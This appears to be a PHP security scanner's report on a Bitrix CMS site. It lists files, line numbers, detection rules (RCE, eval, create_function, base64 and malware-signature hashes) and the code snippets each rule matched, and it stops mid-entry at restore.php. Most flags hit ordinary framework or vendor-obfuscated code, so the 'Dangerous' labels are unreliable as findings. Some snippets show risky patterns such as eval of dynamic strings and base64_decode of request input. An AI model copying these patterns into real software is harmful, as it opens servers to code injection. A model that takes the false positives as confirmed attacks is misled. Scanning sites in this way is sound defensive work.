[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a['.$sort.'], $b['.$sort.'])*('.$ord.');')); } $rsData = new CAdminResult(null$sTableID); $rsData->InitFromArray($arLogRecs); $rsData->NavStart(); $lAdmin->NavText($rsData->GetNavPrint(GetMessage("update_log_nav"))); $n 0; while($rec $rsData->Fetch()) { $row = &$lAdmin->AddRow(0null); $aDate explode(" "htmlspecialcharsbx($rec[1])); $row->AddField("DATE"'<span style="white-space:nowrap">'.$aDate[0].'</span> '.$aDate[1]); $row->AddField("DESC...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/checklist.php

Size: 41.67 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 298 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$arPoint["FILE_PATH"])

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/vuln_scanner.php

Size: 63.50 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Sign f9dc0a55 Line: 1938 Dangerous

Malware Signature (hash: f9dc0a55)

'base64_decode'

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/zip.php

Size: 66.90 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('$res = '.$arParams['callback_pre_add'].'(\'callback_pre_add\', $arLocalHeader);'); if ($res == 0) { $arHeader['status'] = "skipped"$res 1; } if ($arHeader['stored_filename'] != $arLocalHeader['stored_filename']) { $arHeader['stored_filename'] = $this->_reducePath($arLocalHeader['stored_filename']); } } if ($arHeader['stored_filename'] == "") { $arHeader['status'] = "filtered"; } if (strlen($arHeader['stored_filename']) > 0xFF) { $arHeader['status'] = 'filename_too_long'; } if ($arHeade...

Sign 963e968a Line: 2571 Dangerous

Malware Signature (hash: 963e968a)

php_uname()

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component.php

Size: 39.86 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 1398 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$epilogFile)

Exploit execution Line: 551 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__path."/component.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component_template.php

Size: 30.34 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 3
DescriptionMatch

Exploit execution Line: 714 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__fileAlt)

Exploit execution Line: 720 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__file)

Exploit execution Line: 877 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$this->__folder."/result_modifier.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/sql_util.php

Size: 22.78 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function("&\$item""\$item=IntVal(\$item);")); $vals array_unique($vals); $val implode(","$vals); if (count($vals) <= 0$arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($valscreate_function("&\$item""\$item=DoubleVal(\$item);")); $vals array_unique($vals); $val implode(","$vals); if (count($vals) <= 0$arSqlSearch_tm...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/grids.php

Size: 16.11 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a["name"], $b["name"]);')); return $arThemes; } public static function GetTheme($grid_id) { $aOptions CUserOptions::GetOption("main.interface.grid"$grid_id, array()); if($aOptions["theme"] == '') { $aGlobalOptions CUserOptions::GetOption("main.interface""global", array(), 0); if($aGlobalOptions["theme_template"][SITE_TEMPLATE_ID] <> ''$theme $aGlobalOptions["theme_template"][SITE_TEMPLATE_ID]; else $theme ""; } else { $theme $aOptions["th...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/main.php

Size: 144.72 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 4 Dangers: 8
DescriptionMatch

Exploit double_var2 Line: 223 Warning

Double var technique is usually used for the obfuscation of malicious code

${$key}

Exploit execution Line: 1424 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path)

Exploit execution Line: 207 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php")

Exploit execution Line: 209 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php")

Exploit execution Line: 289 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog".$isAdmin"_after.php")

Exploit execution Line: 306 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/auth/wrapper.php")

Exploit execution Line: 316 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog".$isAdmin.".php")

Exploit silenced_eval Line: 4588 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("return ".$strCondition.";")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a[1] == $b[1]) return 0; return ($a[1] < $b[1])? -1 : 1;')); $res = array(); foreach($this->__view[$view] as $item$res[] = $item[0]; return implode($res); } public static function OnChangeFileComponent($path$site) { global $APPLICATION; if(!HasScriptExtension($path)) return; $docRoot CSite::GetSiteDocRoot($site); CUrlRewriter::Delete( array("SITE_ID" => $site"PATH" => $path"ID" => "NULL") ); if (class_exists("\\Bitrix\\Main\\Application"false)) { \Bitri...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("?>".$fTmp->GetContents()); } $FILE_PERM $PERM[$path_file]; if(!is_array($FILE_PERM)) $FILE_PERM = array(); if(!$bOverWrite && count($FILE_PERM)>0) return true$bDiff false$str="<?\n"; foreach($arPermissions as $group=>$perm) { if(strlen($perm) > 0$str .= "\$PERM[\"".EscapePHPString($path_file)."\"][\"".EscapePHPString($group)."\"]=\"".EscapePHPString($perm)."\";\n"; if(!$bDiff) { $curr_perm $FILE_PERM[$group]; if(!isset($curr_perm) && preg_match('/^G[0-9]+$/'$group)) $curr_per...

Function posix_kill Warning

Potentially dangerous function `posix_kill`

[https://www.php.net/posix_kill]

posix_kill(getmypid(), 9);')); define("BX_FORK_AGENTS_AND_EVENTS_FUNCTION_STARTED", true); global $DB, $CACHE_MANAGER; $CACHE_MANAGER = new CCacheManager; $DBHost = $DB->DBHost; $DBName = $DB->DBName; $DBLogin = $DB->DBLogin; $DBPassword = $DB->DBPassword; $DB = new CDatabase; $DB->Connect($DBHost, $DBName, $DBLogin, $DBPassword); $app = \Bitrix\Main\Application::getInstance(); if ($app != null) { $con = $app->getConnection(); if ($con != null) $con->connect(); } $DB->DoConnect(); $DB->StartUsin...

Sign 11413268 Line: 1625 Dangerous

Malware Signature (hash: 11413268)

eval("?>

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_client.php

Size: 249.86 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 2 Dangers: 14
DescriptionMatch

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

'X1VwZGF0ZVN5c3RlbScpLCAwLCAxMDI0KTsKICAgICAgICAgICAgICAgICAgICBteV9yZXN1bHQ6PWRibXNfbG9jay5yZXF1ZXN0KG15X2xvY2tfaWQsIGRibXNfbG9jay54X21vZGUsIDAsIHRydWUpOwogICAgICAgICAgICAgICAgICAgIC0tICBSZXR1cm4gdmFsdWU6CiAgICAgICAgICAgICAgICAgICAgLS0gICAgMCAtIHN1Y2Nlc3MKICAgICAgICAgICAgICAgICAgICAtLSAgICAxIC0gdGltZW91dAogICAgICAgICAgICAgICAgICAgIC0tICAgIDIgLSBkZWFkbG9jawogICAgICAgICAgICAgICAgICAgIC0tICAgIDMgLSBwYXJhbWV0ZXIgZXJyb3IKICAgICAgICAgICAgICAgICAgICAtLSAgICA0IC0gYWxyZWFkeSBvd24gbG9jayBzcGVjaWZpZWQgYnk...

Exploit execution Line: 1 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER[___504618485(2217)

Exploit silenced_eval Line: 1 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval($GLOBALS['____1347154205'][1005](array('<?php''<?''?>')

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($_267581649["#"]["cdata-section"][(910-2*455)]["#"]);} catch(Exception $_904795991){ $_1075876051___504618485(38).$_904795991->getCode().___504618485(39).$_904795991->getMessage();} $_143313344 .= ___504618485(40).$GLOBALS['____1347154205'][24]($_267581649[___504618485(41)][___504618485(42)]).___504618485(43).$GLOBALS['____1347154205'][25]($_1075876051);}} if(empty($_796463733)){ CUpdateClient::AddMessage2Log($GLOBALS['____1347154205'][26](___504618485(44), ___504618485(45), $_143313344))...

Sign 7186bb8d Line: 1 Dangerous

Malware Signature (hash: 7186bb8d)

RlZmluZ

Sign 7830f7a6 Line: 1 Dangerous

Malware Signature (hash: 7830f7a6)

N5c3Rlb

Sign 7f5d33bf Line: 1 Dangerous

Malware Signature (hash: 7f5d33bf)

JlcGxhY2

Sign 91535293 Line: 1 Dangerous

Malware Signature (hash: 91535293)

luY2x1ZG

Sign 99fc3b9d Line: 1 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign a408f408 Line: 1 Dangerous

Malware Signature (hash: a408f408)

c3RyX

Sign ae7830db Line: 1 Dangerous

Malware Signature (hash: ae7830db)

Y2xvc2

Sign d30fc49e Line: 1 Dangerous

Malware Signature (hash: d30fc49e)

b3Blb

Sign d97f004d Line: 1 Dangerous

Malware Signature (hash: d97f004d)

ZXhlYy

Sign de12c454 Line: 1 Dangerous

Malware Signature (hash: de12c454)

vcGVu

Sign ee1cb326 Line: 1 Dangerous

Malware Signature (hash: ee1cb326)

9wZW

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

'base64_decode'

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_list.php

Size: 1.21 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("parent."+this.name+"_"+str);
    }
    catch(
e){}
}
</script>

</head>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" bgcolor="white">

<table width="100%" border="0" id="updates_items">
</table>

</body>
</html>
<? require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/epilog_after.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/menu.php

Size: 15.46 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("return ".$CONDITION.";"))) $bSkipMenuItem true; } if(!$bSkipMenuItem$ITEM_INDEX++; if(($pos strpos($LINK"?"))!==false$ITEM_TYPE "U"; elseif(substr($LINK, -1)=="/"$ITEM_TYPE "D"; else $ITEM_TYPE "P"$SELECTED false; if($bCached) { $all_links $arMenuCache[$iMenuItem]["LINKS"]; if(!is_array($all_links)) $all_links = array(); } else { $all_links = array(); if(is_array($ADDITIONAL_LINKS)) { foreach($ADDITIONAL_LINKS as $link) { $tested_link trim(Rel2Abs($this->MenuDir, ...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_class.php

Size: 140.73 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
DescriptionMatch

Exploit execution Line: 3798 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

Exploit silenced_eval Line: 3274 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine

@eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$path=".$str_fill_path_value_2.$path."((\$by=\"\"),(\$order=\"\"),array(\"ACTIVE\"=>\"Y\"));\$cnt=0;while(\$ar_"."res=\$path->Fe"."tch())\$cnt++;"); return $cnt;} } public static function GetModuleVersion($module) { if (strlen($module)<=0) return false$strModule_tmp_dir $_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/".$module; if (file_exists($strModule_tmp_dir) && is_dir($strModule_tmp_dir)) { if ($module != "main") { if (file_exists($strModule_tmp_dir."/install/index.php")) { $arModule_...

Sign 696317c4 Line: 3274 Dangerous

Malware Signature (hash: 696317c4)

@eval("\

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_client_partner.php

Size: 75.03 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 564 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/site_checker.php

Size: 87.94 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 4
DescriptionMatch

Exploit execution Line: 2845 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')

Exploit execution Line: 2931 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/dbconn_error.php")

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec('catdoc -V'$output$return_var); if ($return_var === 0) { $version $output[0]; if (strpos($version'0.94.4') !== false || strpos($version'0.94.3') !== false$strError .= GetMessage('MAIN_CATDOC_WARN', array('#VERSION#' => $version)); } } return $this->Result(false$strError); } function check_fast_download() { $tmp $_SERVER['DOCUMENT_ROOT'].'/bitrix/tmp/success.txt'; if (!CheckDirPath($tmp) || !file_put_contents($tmp'SUCCESS')) return $this->Result(falseGetMessage("MAIN_TMP_...

Sign 471b95ee Line: 513 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

Sign 471b95ee Line: 515 Dangerous

Malware Signature (hash: 471b95ee)

SUHOSIN

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/wizard_site.php

Size: 40.55 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcmp($a["SORT"], $b["SORT"]);')); if (array_key_exists("GROUPS"$arWizardTemplates) && is_array($arWizardTemplates["GROUPS"])) $this->arTemplateGroups $arWizardTemplates["GROUPS"]; } function __GetInstallationScript() { $instScript $_SERVER["DOCUMENT_ROOT"].$this->path."/wizard.php"; if (!is_file($instScript)) return false$this->pathToScript $instScript; return true; } function __GetServices() { $serviceFile $_SERVER["DOCUMENT_ROOT"].$this->path."/....

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/controller_member.php

Size: 41.85 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 1076 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['parameters'])

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($disconnect_command); COption::SetOptionString("main""controller_member""N"); } public static function GetBackup($bRefresh false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh$arCachedData unserialize(COption::GetOptionString("main""~controller_backup""")); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main""~controller_backup"serialize($arBackup)); CControllerClient::GetBackup(true); } public static functio...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/mysql/database.php

Size: 23.42 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
DescriptionMatch

Exploit double_var2 Line: 678 Warning

Double var technique is usually used for the obfuscation of malicious code

${$varnameFrom}

Exploit execution Line: 192 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbquery_error.php")

Exploit execution Line: 194 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/dbquery_error.php")

Function strrev eval_strrev Line: 126 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

lave

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/mysql/agent.php

Size: 5.14 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("\$eval_result=".$arAgent["NAME"]); } catch (Exception $e) { CTimeZone::Enable(); $application = \Bitrix\Main\Application::getInstance(); $exceptionHandler $application->getExceptionHandler(); $exceptionHandler->writeToLog($e); continue; } CTimeZone::Enable(); if ($logFunction$logFunction($arAgent"finish"$eval_result$e); if($e === false) { continue; } elseif(strlen($eval_result)<=0) { $strSql "DELETE FROM b_agent WHERE ID=".$arAgent["ID"]; } else { $strSql "
                    UPDATE b_agen...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/spread.php

Size: 1.34 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 11 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_GET["s"])

Exploit execution Line: 7 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/public/top_panel.php

Size: 54.78 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 948 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/include/add_top_panel.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/public/menu_edit.php

Size: 21.81 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(\''.$out.'\');'?>

    var arCellsHTML = [
        '<span class="rowcontrol drag" title="<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_DRAG'))?>"></span>',
        getAreaHTML('text_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_TEXT_EDIT'))?>'),
        getAreaHTML('link_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_LINK_EDIT'))?>'),
        '<span onclick="if (!GLOBAL_bDisableActions) {currentLink = \'' + nums + '\'; OpenFileBrowserWindFile_' + nums + '();}" class="rowcontrol...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin_tools.php

Size: 23.88 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 3
DescriptionMatch

Exploit execution Line: 180 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].$root.$init."/.description.php")

Exploit execution Line: 232 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path_mod."/".$file_templ."/.description.php")

Exploit execution Line: 266 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path."/".$folder_name."/.description.php")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$v1,$v2','if ($v1>$v2) return 1; elseif ($v1<$v2) return -1;')); return $arrTemplate; } } class CTemplates { public static function GetList($arFilter = array(), $arCurrentValues = array(), $template_id = array()) { if(!is_set($arFilter"FOLDER")) { $arr CTemplates::GetFolderList(); $arFilter["FOLDER"] = array_keys($arr); } $arTemplates = array(); foreach($arFilter["FOLDER"] as $folder) { $folder _normalizePath($folder); $arTemplates[$folder] = array(); $arPath = array( "/bi...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/index.php

Size: 649.00 B Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 2
DescriptionMatch

Exploit execution Line: 13 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php")

Exploit execution Line: 15 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist.php

Size: 44.38 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(<?=$arStates;?>);
        var DetailWindow = false;
        var arMainStat ={
            "REQUIRE":<?=$arStat["REQUIRE"];?>,
            "REQUIRE_CHECK":<?=$arStat["REQUIRE_CHECK"];?>,
            "FAILED":<?=$arStat["FAILED"];?>,
            "SUCCESS":<?=$arStat["CHECK"];?>,
            "SUCCESS_R":<?=$arStat["CHECK_R"];?>,
            "TOTAL":<?=$arStat["TOTAL"];?>
        };
        var arRequireCount=<?=$arStat["REQUIRE"];?>;
        var arRequireCheckCount=<?=$arStat["REQUIRE_CHECK"];?>;
        var arFailedCount = <?=$arStat["FAILED"];?>;
        var CanClose = "<?=$arCanClose;...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/user_admin.php

Size: 23.85 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 69 Warning

Double var technique is usually used for the obfuscation of malicious code

${$f}

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/settings.php

Size: 11.09 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["SORT"] == $b["SORT"]) return strcasecmp($a["NAME"], $b["NAME"]); return ($a["SORT"] < $b["SORT"])? -1 : 1;')); $mid $_REQUEST["mid"]; if($mid == "" || !isset($arModules[$mid]) || !file_exists($arModules[$mid]["PAGE"])) $mid "main"ob_start(); include($arModules[$mid]["PAGE"]); $strModuleSettingsTabs ob_get_contents(); ob_end_clean(); $APPLICATION->SetTitle(GetMessage("MAIN_TITLE")); require_once ($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/pr...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/checklist_detail.php

Size: 15.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 25 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/lang/".LANG."/admin/checklist.php")

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval("(" +data+")");
                var 
show_result false;
                var 
buttons BX.findChildren(BX('checklist-popup-tes-status'), {className:'checklist-popup-tes-status'});
                if (
json_data.STATUS || stoptest == true)
                {
                    if (
json_data.STATUS)
                    {
                        
BX("show_detail_link").style.display "none";
                        
BX("detail_system_comment_<?=$jsTestID;?>").innerHTML "";
                        
currentStatus json_data.STATUS;
                        
RefreshCheckList(json_data);
                        for(var 
i=0i<buttons.lengthi++)
                        
BX.removeCl...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/module_admin.php

Size: 7.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["MODULE_SORT"] == $b["MODULE_SORT"]) return strcasecmp($a["MODULE_NAME"], $b["MODULE_NAME"]); return ($a["MODULE_SORT"] < $b["MODULE_SORT"])? -1 : 1;')); $fb = ($id == 'fileman' && !$USER->CanDoOperation('fileman_install_control')); if($isAdmin && !$fb && check_bitrix_sessid()) { if(strlen($_REQUEST["uninstall"])>|| strlen($_REQUEST["install"])>0) { $id str_replace("\\"""str_replace("/"""$id)); if($Module CModule::CreateModuleObject($id)) { if($Modu...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/admin/restore.php

Size: 162.40 kB Created: 2017-06-21 17:31:49 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 2
DescriptionMatch

Exploit execution Line: 701 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

